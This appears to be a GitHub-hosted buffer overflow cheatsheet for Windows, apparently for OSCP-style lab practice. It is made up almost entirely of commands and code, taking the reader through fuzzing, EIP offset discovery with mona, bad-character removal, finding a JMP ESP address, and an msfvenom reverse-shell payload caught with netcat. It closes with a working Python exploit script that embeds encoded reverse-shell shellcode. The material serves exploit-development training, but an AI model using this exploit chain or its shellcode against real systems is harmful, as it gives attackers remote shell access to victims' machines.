Skip to content

Latest commit

 

History

History
235 lines (198 loc) · 8.14 KB

buffer-overflow-guide.md

File metadata and controls

235 lines (198 loc) · 8.14 KB

Buffer Overflow Cheatsheet

Table of Contents

Fuzz the App

USER=admin
PASS=password
TARGET=???
xfreerdp /u:$USER /p:$PASS /cert:ignore /workarea /v:$TARGET
cd exploits
vim fuzzer.py # update the IP variable
python fuzzer.py

# output

Find the EIP Register

msf-pattern_create -l ???

# output
# restart the app first
vim exploit.py # PAYLOAD: (output above)
python exploit.py

# output
!mona findmsp -distance ???

# output

Identify Bad Characters

bytearray 

# output
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
# restart the app first
vim exploit.py # OFFSET: ???, PAYLOAD: (output above), RETN: "BBBB"
python exploit.py

# output
!mona config -set workingfolder c:\mona\%p

# output
0BADF00D   [+] Command used:
0BADF00D   !mona config -set workingfolder c:\mona\%p
0BADF00D   Writing value to configuration file
0BADF00D   Old value of parameter workingfolder =
0BADF00D   [+] Creating config file, setting parameter workingfolder
0BADF00D   New value of parameter workingfolder =  c:\mona\%p
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:00
!mona bytearray -b "\x00"

# output
0BADF00D   [+] Command used:
0BADF00D   !mona bytearray -b "\x00"
0BADF00D    *** Note: parameter -b has been deprecated and replaced with -cpb ***
0BADF00D   Generating table, excluding 1 bad chars...
0BADF00D   Dumping table to file
0BADF00D   [+] Preparing output file 'bytearray.txt'
0BADF00D       - Creating working folder c:\mona\oscp
0BADF00D       - Folder created
0BADF00D       - (Re)setting logfile c:\mona\oscp\bytearray.txt
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
0BADF00D
0BADF00D   Done, wrote 255 bytes to file c:\mona\oscp\bytearray.txt
0BADF00D   Binary output saved in c:\mona\oscp\bytearray.bin
0BADF00D
0BADF00D   [+] This mona.py action took 0:00:00.016000
!mona compare -f C:\mona\oscp\bytearray.bin -a ???

# output
# repeat the following until "Status = Unmodified": 
#   start app
#   send exploit
#   generate a new byte array
#   compare to ESP
#   remove bad characters (look at the Comparison Results table in the Log data window, remove the characters underlined by "0a")

# ESP     , BADCHARS
# 0188FA30, "\x00\x??\x??\x??\x??"

vim exploit.py # BADCHARS = "\x00\x??\x??\x??\x??"
python exploit.py

# output
!mona compare -f c:\mona\oscp\bytearray.bin -a ???

# output

Find a JMP Instruction

!mona jmp -r esp -cpb "???"

# output
# ADDRESS: "???" # address of JMP instruction
# RETN: "???" # address of JMP instrucion, in Little Endian

Generate a Payload

ip address
LHOST=10.10.10.69 # USE YOUR IP ADDRESS!
BADCHARS="\x00\x??\x??\x??\x??" 
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f python -v PAYLOAD EXITFUNC=thread -b $BADCHARS

# output

Send the Exploit

# restart the app first
vim exploit.py # RETN: (address of JMP instruction found), PAYLOAD: (output above), PADDING: "\x90" * 16
python exploit.py

# output
sudo nc -nvlp 443

# output

Exploit

#!/usr/bin/env python3

import socket

IP = "10.10.10.23" # change me
PORT = 1337 # change me
TARGET = (IP,PORT)
PREFIX = "OVERFLOW0 " # change me; vulnerable function of target
OFFSET = ??? # change me; fuzz the target to determine the correct value
OVERFLOW = "A" * OFFSET # bogus chars that will preceed the 
RETN = "???" # address of a JMP instruction, in Little Endian
PADDING = "\x90" * 16 # so the msfvenom encoder does not overwrite itself
BADCHARS = "???" # exclude these from your shellcode
# msfvenom -p windows/shell_reverse_tcp LHOST=??? LPORT=443 -f python -v PAYLOAD EXITFUNC=thread -b "???"
PAYLOAD =  b""
PAYLOAD += b"\xfc\xbb\xcc\xfa\xd6\x3b\xeb\x0c\x5e\x56\x31\x1e"
PAYLOAD += b"\xad\x01\xc3\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff"
PAYLOAD += b"\xff\x30\x12\x54\x3b\xc8\xe3\x39\xb5\x2d\xd2\x79"
PAYLOAD += b"\xa1\x26\x45\x4a\xa1\x6a\x6a\x21\xe7\x9e\xf9\x47"
PAYLOAD += b"\x20\x91\x4a\xed\x16\x9c\x4b\x5e\x6a\xbf\xcf\x9d"
PAYLOAD += b"\xbf\x1f\xf1\x6d\xb2\x5e\x36\x93\x3f\x32\xef\xdf"
PAYLOAD += b"\x92\xa2\x84\xaa\x2e\x49\xd6\x3b\x37\xae\xaf\x3a"
PAYLOAD += b"\x16\x61\xbb\x64\xb8\x80\x68\x1d\xf1\x9a\x6d\x18"
PAYLOAD += b"\x4b\x11\x45\xd6\x4a\xf3\x97\x17\xe0\x3a\x18\xea"
PAYLOAD += b"\xf8\x7b\x9f\x15\x8f\x75\xe3\xa8\x88\x42\x99\x76"
PAYLOAD += b"\x1c\x50\x39\xfc\x86\xbc\xbb\xd1\x51\x37\xb7\x9e"
PAYLOAD += b"\x16\x1f\xd4\x21\xfa\x14\xe0\xaa\xfd\xfa\x60\xe8"
PAYLOAD += b"\xd9\xde\x29\xaa\x40\x47\x94\x1d\x7c\x97\x77\xc1"
PAYLOAD += b"\xd8\xdc\x9a\x16\x51\xbf\xf2\xdb\x58\x3f\x03\x74"
PAYLOAD += b"\xea\x4c\x31\xdb\x40\xda\x79\x94\x4e\x1d\x7d\x8f"
PAYLOAD += b"\x37\xb1\x80\x30\x48\x98\x46\x64\x18\xb2\x6f\x05"
PAYLOAD += b"\xf3\x42\x8f\xd0\x54\x12\x3f\x8b\x14\xc2\xff\x7b"
PAYLOAD += b"\xfd\x08\xf0\xa4\x1d\x33\xda\xcc\xb4\xce\x8d\xf8"
PAYLOAD += b"\x40\x30\xfc\x95\x52\xb0\xfe\xde\xda\x56\x6a\x31"
PAYLOAD += b"\x8b\xc1\x03\xa8\x96\x99\xb2\x35\x0d\xe4\xf5\xbe"
PAYLOAD += b"\xa2\x19\xbb\x36\xce\x09\x2c\xb7\x85\x73\xfb\xc8"
PAYLOAD += b"\x33\x1b\x67\x5a\xd8\xdb\xee\x47\x77\x8c\xa7\xb6"
PAYLOAD += b"\x8e\x58\x5a\xe0\x38\x7e\xa7\x74\x02\x3a\x7c\x45"
PAYLOAD += b"\x8d\xc3\xf1\xf1\xa9\xd3\xcf\xfa\xf5\x87\x9f\xac"
PAYLOAD += b"\xa3\x71\x66\x07\x02\x2b\x30\xf4\xcc\xbb\xc5\x36"
PAYLOAD += b"\xcf\xbd\xc9\x12\xb9\x21\x7b\xcb\xfc\x5e\xb4\x9b"
PAYLOAD += b"\x08\x27\xa8\x3b\xf6\xf2\x68\x5b\x15\xd6\x84\xf4"
PAYLOAD += b"\x80\xb3\x24\x99\x32\x6e\x6a\xa4\xb0\x9a\x13\x53"
PAYLOAD += b"\xa8\xef\x16\x1f\x6e\x1c\x6b\x30\x1b\x22\xd8\x31"
PAYLOAD += b"\x0e\x22\xde\xcd\xb1"
SUFFIX = "" 
EXPLOIT = PREFIX + OVERFLOW + RETN + PADDING + PAYLOAD + SUFFIX

print("[*] Attacking: %s" % IP)
try:
    CLIENT = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    CLIENT.settimeout(3)
    CLIENT.connect(TARGET)
    CLIENT.send(EXPLOIT)
    CLIENT.recv(1024)
    CLIENT.close()
    print("[+] Sent exploit.")
except socket.error as ERROR:
    print("[!] Failed to connect.")
    exit()